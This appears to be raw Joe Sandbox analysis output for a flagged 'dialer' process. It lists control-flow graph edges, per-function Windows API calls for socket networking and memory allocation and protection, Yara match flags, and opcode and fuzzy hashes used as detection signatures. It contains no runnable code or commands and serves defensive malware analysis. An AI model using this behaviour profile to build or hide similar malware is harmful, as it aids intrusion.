594aeb8 15203 594ac90 memset htons 15189->15203 15192 594af01 getsockopt 15194 594af26 15192->15194 15195 594af30 closesocket 15192->15195 15193 594af39 WSAGetLastError 15196 594af45 15193->15196 15194->15195 15197 594af46 socket 15195->15197 15196->15197 15198 594af8b 
WSAGetLastError 15197->15198 15200 594af57 closesocket 15197->15200 15199 594af97 15198->15199 15200->15199 15202->15189 15206 594c4f1 15203->15206 15205 594acc9 socket 15205->15192 15205->15193 15207 594c51a 15206->15207 15208 594c4fb 15206->15208 15220 594c529 15207->15220 15209 594c500 15208->15209 15213 594c5f6 memset 15208->15213 15209->15205 15212 594c518 15212->15205 15216 594c61f 15213->15216 15214 594c646 strchr 15215 594c65c strchr 15214->15215 15214->15216 15215->15216 15216->15214 15217 594c747 15216->15217 15219 594c6e7 __cfltcvt 15216->15219 15218 594c529 strchr 15217->15218 15217->15219 15218->15219 15219->15212 15222 594c54e 15220->15222 15223 594c5c2 __cfltcvt 15220->15223 15221 594c553 strchr 15221->15222 15222->15221 15222->15223 15223->15212 16924 59444f8 16925 59443a6 7 API calls 16924->16925 16926 5944515 16925->16926 17073 5948dfb 17074 5948e04 17073->17074 17075 5948e0e 17073->17075 17076 5948e11 5 API calls 17074->17076 17076->17075 15224 594453e 15227 5944551 15224->15227 15228 594455b 15227->15228 15231 5949721 15228->15231 15230 594454f 15232 594973d 15231->15232 15233 594972d 15231->15233 15232->15233 15236 5949ef3 15232->15236 15233->15230 15238 5949f20 15236->15238 15237 5949762 15237->15230 15238->15237 15239 5949f56 15238->15239 15240 5949f49 CreateEventA 15238->15240 15242 5949f64 memset 15239->15242 15240->15239 15243 5949f91 memset 15242->15243 15245 5949fd5 15243->15245 15246 5949fdd WSARecv 15243->15246 15245->15246 15247 594a01f GetLastError 15246->15247 15248 5949fff 15246->15248 15247->15248 15249 594a02c WSAGetLastError 15247->15249 15252 594a07a RegisterWaitForSingleObject 15248->15252 15253 594a009 15248->15253 15250 594a036 WSAGetLastError 15249->15250 15251 594a03e WSAGetLastError 15249->15251 15250->15253 15251->15253 15252->15253 15253->15237 16927 5942d39 16929 5942d48 16927->16929 16928 5942d6e 16931 5942d71 16929->16931 16943 59439c1 16929->16943 16931->16928 16936 5941a2b 16931->16936 16934 5942d68 16951 5942dba 
                                                                                      Control-flow graph edge list (Joe Sandbox IDA plugin output, truncated at the start of this section; node ids and edges not reproduced). Functions and API calls named in the graph: malloc, memset, free, __cfltcvt, getaddrinfo, FreeAddrInfoW, htons, WSAIoctl, socket, bind, SetHandleInformation, GetLastError, WSAGetLastError, closesocket, ioctlsocket, CreateIoCompletionPort, SetFileCompletionNotificationModes, setsockopt, _errno, abort.

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 05949F7B
                                                                                      • memset.MSVCRT ref: 05949FC7
                                                                                      • WSARecv.WS2_32(FFE0458D,00000000,00000001,?,00000000,059421F9,00000000), ref: 05949FF5
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000001), ref: 0594A01F
                                                                                      • WSAGetLastError.WS2_32(?,?,?,?,?,00000001), ref: 0594A02C
                                                                                      • WSAGetLastError.WS2_32(?,?,?,?,?,00000001), ref: 0594A036
                                                                                      • WSAGetLastError.WS2_32(?,?,?,?,?,00000001), ref: 0594A03E
                                                                                      • RegisterWaitForSingleObject.KERNEL32(05942219,30C48300,05949EAD,059421E9,000000FF,00000004), ref: 0594A088
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$memset$ObjectRecvRegisterSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 2020750497-0
                                                                                      • Opcode ID: 0a64cb8a126250f30a1502bfde67f5a83319afb9ebd883c22d0dc2fe9da33b52
                                                                                      • Instruction ID: 1e47c46287ac3ecfbcf8ebf7d6d8a825d763bf34f10d97b5689869f764280d24
                                                                                      • Opcode Fuzzy Hash: 0a64cb8a126250f30a1502bfde67f5a83319afb9ebd883c22d0dc2fe9da33b52
                                                                                      • Instruction Fuzzy Hash: CF419A31644604EFE721DF64C849FAABBF9FF06310F108A29E952E6590D774EA08CF91

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • socket.WS2_32(00000010,00000001,00000000), ref: 05949A6C
                                                                                      • WSAGetLastError.WS2_32(?,?,?,05949A53,0594AD04,00000002,0594AD04,00000010,0594AD04,0594AD81), ref: 05949A79
                                                                                        • Part of subcall function 05949B02: ioctlsocket.WS2_32(0594AD04,8004667E,0594AD81), ref: 05949B1D
                                                                                        • Part of subcall function 05949B02: WSAGetLastError.WS2_32(?,?,05949AC7,17E80870,0594AD04,00000000,00000010,00000000,?,?,?,05949A53,0594AD04,00000002,0594AD04,00000010), ref: 05949B28
                                                                                      • SetHandleInformation.KERNEL32(00000000,00000001,00000000,?,?,?,05949A53,0594AD04,00000002,0594AD04,00000010,0594AD04,0594AD81), ref: 05949A94
                                                                                      • GetLastError.KERNEL32(?,?,?,05949A53,0594AD04,00000002,0594AD04,00000010,0594AD04,0594AD81), ref: 05949A9E
                                                                                      • closesocket.WS2_32(00000000), ref: 05949AB0
                                                                                      • bind.WS2_32(50A5A5A5,0594AD04,00000002), ref: 05949AD7
                                                                                      • WSAGetLastError.WS2_32(?,?,?,05949A53,0594AD04,00000002,0594AD04,00000010,0594AD04,0594AD81), ref: 05949AE2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$HandleInformationbindclosesocketioctlsocketsocket
                                                                                      • String ID:
                                                                                      • API String ID: 2417539845-0
                                                                                      • Opcode ID: fdc2722fd71fa259388d441b876251b8e8d16f3c44ba7cdde5be049254ec7d9c
                                                                                      • Instruction ID: 40abbd6a80e8cc87ad98bbaf2e213cf5c7af19003137b89ba156a7d63ff9fc00
                                                                                      • Opcode Fuzzy Hash: fdc2722fd71fa259388d441b876251b8e8d16f3c44ba7cdde5be049254ec7d9c
                                                                                      • Instruction Fuzzy Hash: B8119D31208600EBDB215F74EC0AF6B7FAABB42731F10462CF622A50E0DB71AC449F21
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 032B031C
                                                                                        • Part of subcall function 032B00A0: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 032B00C9
                                                                                        • Part of subcall function 032B00A0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 032B0275
                                                                                      • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 032B036E
                                                                                      • VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 032B03DD
                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 032B03FD
                                                                                      • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 032B0424
                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 032B044C
                                                                                      • CloseHandle.KERNELBASE(?), ref: 032B0467
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000003.2576468383.00000000032B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_3_32b0000_dialer.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
                                                                                      • String ID: ,
                                                                                      • API String ID: 3867569247-3772416878
                                                                                      • Opcode ID: 82e5e3048abb205ecfbadfcc4accb215ed5bf30bd6965aeddf34148881449b51
                                                                                      • Instruction ID: ce7cb0b5bc27983b470169f518ab46f91fc1a27f16cc0054d09480c891139d1f
                                                                                      • Opcode Fuzzy Hash: 82e5e3048abb205ecfbadfcc4accb215ed5bf30bd6965aeddf34148881449b51
                                                                                      • Instruction Fuzzy Hash: 1D51DE75910609EFCB11DFA5C884ADEBBB8FF08354F14C529F955A7240D770E985CB60

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE(00008003), ref: 05948AB2
                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 0594AEA0
                                                                                        • Part of subcall function 0594AC49: memset.MSVCRT ref: 0594AC59
                                                                                        • Part of subcall function 0594AC49: htons.WS2_32(00000002), ref: 0594AC6A
                                                                                        • Part of subcall function 0594AC49: inet_addr.WS2_32(?), ref: 0594AC77
                                                                                        • Part of subcall function 0594AC90: memset.MSVCRT ref: 0594ACA0
                                                                                        • Part of subcall function 0594AC90: htons.WS2_32(?), ref: 0594ACB1
                                                                                      • socket.WS2_32(00000002,00000001,00000000), ref: 0594AEED
                                                                                      • getsockopt.WS2_32(00000000,0000FFFF,00002005,?,?), ref: 0594AF1E
                                                                                      • closesocket.WS2_32(00000000), ref: 0594AF31
                                                                                      • WSAGetLastError.WS2_32 ref: 0594AF39
                                                                                      • socket.WS2_32(00000017,00000001,00000000), ref: 0594AF4E
                                                                                      • closesocket.WS2_32(00000000), ref: 0594AF83
                                                                                      • WSAGetLastError.WS2_32 ref: 0594AF8B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Error$Lastclosesockethtonsmemsetsocket$ModeStartupgetsockoptinet_addr
                                                                                      • String ID:
                                                                                      • API String ID: 2777411211-0
                                                                                      • Opcode ID: bdb2f23ecabe28f3b1677ee2a96fdae00c97682a1c9e99406dcaf4d973bf4cd4
                                                                                      • Instruction ID: 797ba9ca8b6a71a94bbeaf6e12717ba0aec14445beed85086d3c205093aa9550
                                                                                      • Opcode Fuzzy Hash: bdb2f23ecabe28f3b1677ee2a96fdae00c97682a1c9e99406dcaf4d973bf4cd4
                                                                                      • Instruction Fuzzy Hash: 7831A9B1258305EBE220EE649C8EFAB7B9EFB85720F40061EF515971C0DB75AD089F61

                                                                                      Control-flow Graph

                                                                                      Control-flow graph for the function at 0594A387 (edge list and executed/not-executed colouring not reproduced). API calls in the graph: memset (x2), CreateEventA, WSASend, GetLastError, WSAGetLastError, RegisterWaitForSingleObject; subcalls to 0594AC0F and 05949E85.
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0594A3AE
                                                                                      • memset.MSVCRT ref: 0594A3BA
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,0594427C,00000000,00000000,05944237,00000000), ref: 0594A3CC
                                                                                      • WSASend.WS2_32(?,0594427C,?,00000000,00000000,00000010,00000000), ref: 0594A3F1
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0594A44A
                                                                                      • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0594A457
                                                                                      • RegisterWaitForSingleObject.KERNEL32(00000048,?,0594A51C,00000000,000000FF,0000000C), ref: 0594A4E3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLastmemset$CreateEventObjectRegisterSendSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 2712206520-0
                                                                                      • Opcode ID: 56a27ee1a7a4ad5a3f3570b18393f707ed9a947d50960297b859fc585c4e4e56
                                                                                      • Instruction ID: 55ba65321c3f2f7945dff7215107619c77814ed5425e0f5de3a47c99982d5cfe
                                                                                      • Opcode Fuzzy Hash: 56a27ee1a7a4ad5a3f3570b18393f707ed9a947d50960297b859fc585c4e4e56
                                                                                      • Instruction Fuzzy Hash: 62517EB1504A06AFD724CF24C984E66BBFAFF09358B00562DE95687A50D730FC59CF90

                                                                                      Control-flow Graph

                                                                                      Control-flow graph for the function at 05949B02 (edge list and executed/not-executed colouring not reproduced). API calls in the graph: ioctlsocket, WSAGetLastError, CreateIoCompletionPort, GetLastError, SetFileCompletionNotificationModes; subcalls to 0594AC0F, 05949BFB and 05949C32.
                                                                                      APIs
                                                                                      • ioctlsocket.WS2_32(0594AD04,8004667E,0594AD81), ref: 05949B1D
                                                                                      • WSAGetLastError.WS2_32(?,?,05949AC7,17E80870,0594AD04,00000000,00000010,00000000,?,?,?,05949A53,0594AD04,00000002,0594AD04,00000010), ref: 05949B28
                                                                                      • CreateIoCompletionPort.KERNELBASE(0594AD04,19751710,0594AD04,00000000,?,?,05949AC7,17E80870,0594AD04,00000000,00000010,00000000,?,?,?,05949A53), ref: 05949B48
                                                                                      • SetFileCompletionNotificationModes.KERNEL32(0594AD04,00000003,?,?,05949AC7,17E80870,0594AD04,00000000,00000010,00000000,?,?,?,05949A53,0594AD04), ref: 05949B8A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Completion$CreateErrorFileLastModesNotificationPortioctlsocket
                                                                                      • String ID:
                                                                                      • API String ID: 3397353003-0
                                                                                      • Opcode ID: cbcb82adbc461a3e00964df8989fc8805346c8653879fe55e2be1446c9e15501
                                                                                      • Instruction ID: 6a3b164e1c4885658b35556d482fd781b5dc0643e4e6c52c1419d16a88cbaee1
                                                                                      • Opcode Fuzzy Hash: cbcb82adbc461a3e00964df8989fc8805346c8653879fe55e2be1446c9e15501
                                                                                      • Instruction Fuzzy Hash: F1318171518205EBDB219E659C89F673BAEFF41294F144529FA43921C0EB70ED44CF61

                                                                                      Control-flow Graph

                                                                                      Control-flow graph for the function at 0594A0C0 (edge list and executed/not-executed colouring not reproduced). API calls in the graph: memset, GetLastError, WSAGetLastError; subcalls to 0594ACDD, 0594AE30, 0594AC0F and 05949E85.
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2ab7ae3f564c6ca089a087417e4eebc4dac5dc145463ca083a69173d88c6c3e2
                                                                                      • Instruction ID: aacfb45f51454ccb6085092e801a1dae4acb29310deb0cfbfcaf666891440575
                                                                                      • Opcode Fuzzy Hash: 2ab7ae3f564c6ca089a087417e4eebc4dac5dc145463ca083a69173d88c6c3e2
                                                                                      • Instruction Fuzzy Hash: 38418DB15442019FDB14CF25C884FA2B7BAFF49328F448569ED168F296EB31E845CFA0

                                                                                      Control-flow Graph

                                                                                      Control-flow graph for the function at 0594AA5B (edge list and executed/not-executed colouring not reproduced). API calls in the graph: shutdown, closesocket (x2); subcalls to 0594AB98.
                                                                                      APIs
                                                                                      • shutdown.WS2_32(D7FF5605,00000001), ref: 0594AA7E
                                                                                      • closesocket.WS2_32(?), ref: 0594AAD4
                                                                                      • closesocket.WS2_32(D7FF5605), ref: 0594AB4D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: closesocket$shutdown
                                                                                      • String ID:
                                                                                      • API String ID: 3079814495-0
                                                                                      • Opcode ID: 40455434e0ec4754dbb3a1779fb2bd6ee4852f256e5686d92bed9765dfbaccb3
                                                                                      • Instruction ID: fa6b78b2c1ac1772a6b0f0425b3156e7d7cfe1e20b41115fc7523aa5d5a299a1
                                                                                      • Opcode Fuzzy Hash: 40455434e0ec4754dbb3a1779fb2bd6ee4852f256e5686d92bed9765dfbaccb3
                                                                                      • Instruction Fuzzy Hash: 05413A70694B018FEB358E65C544FA6B7EFFB01365F044A1DE89296AA0D730EC46CF40

                                                                                      Control-flow Graph

                                                                                      Control-flow graph for the function at 0594A983 (edge list and executed/not-executed colouring not reproduced). API calls in the graph: setsockopt, WSAGetLastError; subcalls to 0594AFCA, 0594AC0F and 05949ECB.
                                                                                      APIs
                                                                                      • setsockopt.WS2_32(?,0000FFFF,00007010,00000000,00000000), ref: 0594A9D7
                                                                                      • WSAGetLastError.WS2_32(?,05948D2F,00000000,00000000,?,00000000,00000000,00000000,05948BB0,00000000,?,00000000,05942CE1,?,00000000,?), ref: 0594A9FF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLastsetsockopt
                                                                                      • String ID:
                                                                                      • API String ID: 1729277954-0
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 032B00C9
                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 032B0275
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000003.2576468383.00000000032B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_3_32b0000_dialer.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$AllocFree
                                                                                      • String ID:
                                                                                      • API String ID: 2087232378-0

                                                                                      APIs
                                                                                      • free.MSVCRT(74C08559,74C08559,0000414D,00000000,?,00000000,05944237,05944300,05944237,00000000,0594429A,?,00000000,05944237,00000000,05944361), ref: 0594F086
                                                                                      • strlen.MSVCRT ref: 0594F0EC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: freestrlen
                                                                                      • String ID:
                                                                                      • API String ID: 322734593-0

                                                                                      APIs
                                                                                      • malloc.MSVCRT ref: 059446F4
                                                                                      • memset.MSVCRT ref: 0594470A
                                                                                        • Part of subcall function 0594E798: memset.MSVCRT ref: 0594E7A3
                                                                                        • Part of subcall function 0594E7AC: calloc.MSVCRT(00000001,0000414D), ref: 0594E7CF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: memset$callocmalloc
                                                                                      • String ID:
                                                                                      • API String ID: 4186080596-0

                                                                                      APIs
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,059421B5,?,05949762,?,059421B5,059421B5,05944579,?,059445AE,059445FA,0594454F,?), ref: 05949F4D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateEvent
                                                                                      • String ID:
                                                                                      • API String ID: 2692171526-0

                                                                                      APIs
                                                                                      • calloc.MSVCRT(00000001,0000414D), ref: 0594E7CF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: calloc
                                                                                      • String ID:
                                                                                      • API String ID: 2635317215-0

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: malloc
                                                                                      • String ID:
                                                                                      • API String ID: 2803490479-0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000003.2576468383.00000000032B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_3_32b0000_dialer.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      APIs
                                                                                      • memcmp.MSVCRT(?,0596DEBC,00000001,00000000,?,0594328A,?,?), ref: 05944AE4
                                                                                      • memcmp.MSVCRT(?,0596DEB8,00000002), ref: 05944B13
                                                                                      • memcmp.MSVCRT(?,0596DEB4,00000003), ref: 05944B53
                                                                                      • memcmp.MSVCRT(?,0596DEA0,00000004), ref: 05944BE8
                                                                                      • memcmp.MSVCRT(?,0596DE98,00000005), ref: 05944C2C
                                                                                      • memcmp.MSVCRT(?,0596DE70,00000006), ref: 05944CEA
                                                                                      • memcmp.MSVCRT(?,0596DE58,00000007), ref: 05944D66
                                                                                      • memcmp.MSVCRT(?,0596DE3C,00000008), ref: 05944DE4
                                                                                      • memcmp.MSVCRT(?,0596DE18,00000009), ref: 05944E60
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 1475443563-0
                                                                                      APIs
                                                                                      • socket.WS2_32(0000138A,00000001,00000000), ref: 05949CCC
                                                                                      • SetHandleInformation.KERNEL32(00000000,00000001,00000000,?,?,?,0594A95A,?,00000000,?,00000000,00000000,?,00000000), ref: 05949D09
                                                                                      • closesocket.WS2_32(00000000), ref: 05949D44
                                                                                      • memset.MSVCRT ref: 05949D5A
                                                                                      • GetLastError.KERNEL32(?,?,?,00000000,00000000,?), ref: 05949DBB
                                                                                      • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,?), ref: 05949DC8
                                                                                      • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,?), ref: 05949DD2
                                                                                      • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,?), ref: 05949DDA
                                                                                      • closesocket.WS2_32(?), ref: 05949DFE
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?), ref: 05949E0C
                                                                                      • RegisterWaitForSingleObject.KERNEL32(00000154,?,05949EAD,00000000,000000FF,00000004), ref: 05949E49
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$Handleclosesocket$CloseInformationObjectRegisterSingleWaitmemsetsocket
                                                                                      • String ID:
                                                                                      • API String ID: 1241441197-0
                                                                                      APIs
                                                                                      • GetUserDefaultLangID.KERNEL32(00000059,00000000,00000020), ref: 05942EEA
                                                                                      • GetUserDefaultLangID.KERNEL32(0000005A,00000000,00000020), ref: 05942F12
                                                                                      • _snwprintf.MSVCRT ref: 05942FB0
                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 05942FCA
                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000080,00000000,00000000), ref: 05942FF8
                                                                                      • strlen.MSVCRT ref: 05943143
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ByteCharDefaultLangMultiUserWide$_snwprintfstrlen
                                                                                      • String ID: z
                                                                                      • API String ID: 2883371422-1657960367
                                                                                      APIs
                                                                                      • shutdown.WS2_32(?,00000001), ref: 059498C7
                                                                                      • WSAGetLastError.WS2_32(?,00000000,?,05948C46,00000000,00000000,00000000,00000000,00000000,00000000,00000000,05948BB6,00000000,00000000,?,00000000), ref: 059498D8
                                                                                      • closesocket.WS2_32(?), ref: 0594994E
                                                                                      • UnregisterWait.KERNEL32(89595908), ref: 05949993
                                                                                      • CloseHandle.KERNEL32(458BF845,00000000,00000000,?,00000000,?,05948C46,00000000,00000000,00000000,00000000,00000000,00000000,00000000,05948BB6,00000000), ref: 059499AD
                                                                                      • free.MSVCRT ref: 059499D3
                                                                                      • UnregisterWait.KERNEL32(?), ref: 059499F4
                                                                                      • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,?,05948C46,00000000,00000000,00000000,00000000,00000000,00000000,00000000,05948BB6,00000000), ref: 05949A06
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandleUnregisterWait$ErrorLastclosesocketfreeshutdown
                                                                                      • String ID:
                                                                                      • API String ID: 3261266694-0
                                                                                      APIs
                                                                                      • API ID: callocfree$memsetsrandstrlentime
                                                                                      • String ID:
                                                                                      • API String ID: 805530809-0
                                                                                      APIs
                                                                                      • API ID: ErrorLast$memset
                                                                                      • String ID:
                                                                                      • API String ID: 4054172246-0
                                                                                      APIs
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0594BB80,?,000000FF,00000000,00000000), ref: 0594B2C7
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,0594BB80), ref: 0594B308
                                                                                      • GetLastError.KERNEL32(?,?,?,0594BB80), ref: 0594B313
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,0594BB80), ref: 0594B31C
                                                                                      • WSASetLastError.WS2_32(00000000,?,?,?,0594BB80), ref: 0594B323
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,0594BB80), ref: 0594B332
                                                                                      • WSASetLastError.WS2_32(00000000,?,?,?,0594BB80), ref: 0594B355
                                                                                      • API ID: ErrorLast$CloseHandle$CreateEventObjectSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 1659421480-0
                                                                                      APIs
                                                                                      • memcmp.MSVCRT(?,0596DDC0,0000000C), ref: 05944F94
                                                                                      • memcmp.MSVCRT(?,0596DDB0,0000000C), ref: 05944FB6
                                                                                      • memcmp.MSVCRT(?,0596DDA0,0000000C), ref: 05944FD8
                                                                                      • memcmp.MSVCRT(?,0596DD80,0000000C), ref: 05945018
                                                                                      • memcmp.MSVCRT(?,0596DD70,0000000C), ref: 0594503A
                                                                                      • memcmp.MSVCRT(?,0596DD60,0000000C), ref: 0594505C
                                                                                      • API ID: memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 1475443563-0
                                                                                      APIs
                                                                                      Strings
                                                                                      • API ID: memcmp$callocfree
                                                                                      • String ID: factfmt RIFFdata
                                                                                      • API String ID: 254810267-2461439165
                                                                                      APIs
                                                                                      • API ID: memset$calloc
                                                                                      • String ID:
                                                                                      • API String ID: 1504270956-0
                                                                                      APIs
                                                                                      Strings
                                                                                      • API ID: strchr$memset
                                                                                      • String ID: 0123456789ABCDEF$0123456789abcdef
                                                                                      • API String ID: 3020236661-885041942
                                                                                      APIs
                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,05948E0E,00000000,0594BB73,0594BBBA,0596EEE0,0594BBC2,0594BB73,00000000), ref: 05948E1E
                                                                                      • InterlockedCompareExchange.KERNEL32(0594BB77,00000000,00000000), ref: 05948E30
